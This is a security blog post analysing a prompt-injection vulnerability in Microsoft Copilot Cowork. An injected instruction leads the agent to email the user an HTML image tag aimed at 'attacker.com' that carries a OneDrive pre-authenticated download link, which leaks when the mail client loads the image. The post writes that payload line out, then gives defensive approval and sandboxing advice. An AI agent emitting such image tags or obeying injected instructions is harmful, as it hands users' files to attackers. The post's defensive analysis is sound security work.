Microsoft Copilot Cowork Exfiltrates Files via Email Rendering

Microsoft Copilot Cowork shipped with a vulnerability that turns agent-to-user notifications into a data exfiltration channel. The attack surface is not the tool call itself but the rendering context where the agent’s output appears.

The vulnerability combines three architectural decisions:

Agents can send emails to the user’s inbox without approval
Those emails render external images that trigger network requests
OneDrive pre-authenticated download links can be embedded in the message body

When a prompt injection succeeds, the agent generates an email containing an image tag pointing to an attacker-controlled domain. The URL includes a OneDrive pre-authenticated link as a query parameter. When the user opens the email, their mail client fetches the image and leaks the file access token to the attacker.

This is not a theoretical attack. It affected a shipping enterprise product.

The Lethal Trifecta in Production

Simon Willison calls this the “lethal trifecta”: prompt injection plus tool permissions plus display context. Most agent security writing focuses on the first two. The display layer is where the exfiltration actually happens.

The flow:

Attacker injects a prompt via a document, email, or web page the agent processes
Agent generates a message with embedded external image: <img src="https://attacker.com/log?token=https://onedrive.live.com/download?cid=ABC123&authkey=XYZ">
Agent calls the “send email to user” tool (no approval required)
User opens email in Outlook or webmail
Mail client fetches the image, sending the OneDrive token to the attacker
Attacker downloads the file using the leaked pre-authenticated link

The agent never directly calls a “send file to external server” tool. It uses an approved notification channel and relies on the email client’s rendering behavior to complete the exfiltration.

Permission Boundary Confusion

The core failure is treating “notify user” and “act on behalf of user” as the same permission tier.

Agents typically have three communication modes:

Mode	Approval	Rendering	Exfiltration Risk
Internal response	None	Sandboxed UI	Low (if sandbox enforces CSP)
Notification to user	None	Full email/Slack rendering	High (external images, links)
Outbound message	Required	N/A (user reviews before send)	Low (user sees content)

Copilot Cowork treated mode 2 like mode 1. The agent could send emails without approval because they were “just notifications.” But those notifications rendered in a full email client with external resource loading enabled.

The fix requires either:

Sandboxing agent-generated emails (strip external images, disable link previews)
Requiring approval for any message that leaves the agent’s controlled UI
Treating “send email to user” as equivalent to “send email on behalf of user”

Pre-Authenticated Links as Exfiltration Primitives

OneDrive and SharePoint generate pre-authenticated download links for sharing. These tokens are bearer credentials: anyone with the URL can download the file.

When an agent has permission to:

Read files from OneDrive
Generate sharing links
Send messages to external channels

You have an exfiltration path. The agent doesn’t need to upload the file anywhere. It just needs to generate a link and send it somewhere the attacker can observe.

This applies to any cloud storage with pre-authenticated URLs:

AWS S3 presigned URLs
Google Cloud Storage signed URLs
Azure Blob Storage SAS tokens
Dropbox shared links

The mitigation is not to block link generation. It’s to ensure that any action that creates a bearer credential and transmits it outside the agent’s sandbox requires explicit user approval.

Rendering Context as Attack Surface

Email clients are designed to render rich content. That means:

External images load automatically (unless user has disabled them)
Link previews fetch metadata from target URLs
Tracking pixels are standard practice
CSS can trigger network requests via url() references

When you display agent-generated content in an email client, you inherit all of these behaviors. The agent doesn’t need to exploit a vulnerability in the email client. It just needs to use standard HTML features.

The same risk exists for:

Slack messages (link previews, image embeds)
Microsoft Teams (similar rendering)
Browser notifications (if they allow rich content)
Mobile push notifications (if they fetch images)

If your agent can send content to any of these channels without approval, and that content can reference external resources, you have an exfiltration vector.

Approval Flow Patterns

The fix is to distinguish between:

Display to user in controlled context: Agent UI, sandboxed iframe, CSP-enforced page
Transmit to user via external channel: Email, Slack, SMS, push notification

For the second category, you need approval before the message leaves your infrastructure. The approval UI should:

Show the full message content including all links and image URLs
Highlight any external domains referenced
Display any file access tokens or credentials embedded in the content
Require explicit confirmation before sending

This is expensive in terms of user friction. But the alternative is treating every notification channel as a potential data leak.

Implementation Checklist

If you’re building an agent that can send messages:

Sandbox agent responses: Use CSP to block external resources in your UI
Strip external content: Remove <img>, <link>, <script> tags from agent-generated messages before displaying them
Require approval for external channels: Treat email, Slack, SMS as high-privilege actions
Audit pre-authenticated link generation: Log every time an agent creates a sharing link or presigned URL
Monitor outbound requests: Alert when agent-generated content triggers external network requests
Rate-limit notifications: Cap how many emails/messages an agent can send per hour

The last point matters because even with approval, a compromised agent can spam the user with approval requests until they click through without reading.

Technical Verdict

Use agent-to-user notifications when:

Messages render in a sandboxed UI you control
External resources are blocked by CSP
The agent cannot generate bearer credentials (pre-authenticated links)

Require approval when:

Messages render in email clients, Slack, or other external channels
Content may include external images or links
The agent has permission to generate file sharing links

Avoid entirely when:

You cannot sandbox the rendering context
The agent has broad file access and can generate pre-authenticated URLs
User approval flows are not practical for your use case

The Copilot Cowork vulnerability shows that even major vendors get this wrong. The attack surface is not just the tools you give the agent. It’s also where the agent’s output gets displayed and what network requests that display context will make on behalf of the user.

Source Links

Microsoft Copilot Cowork Exfiltrates Files (Simon Willison)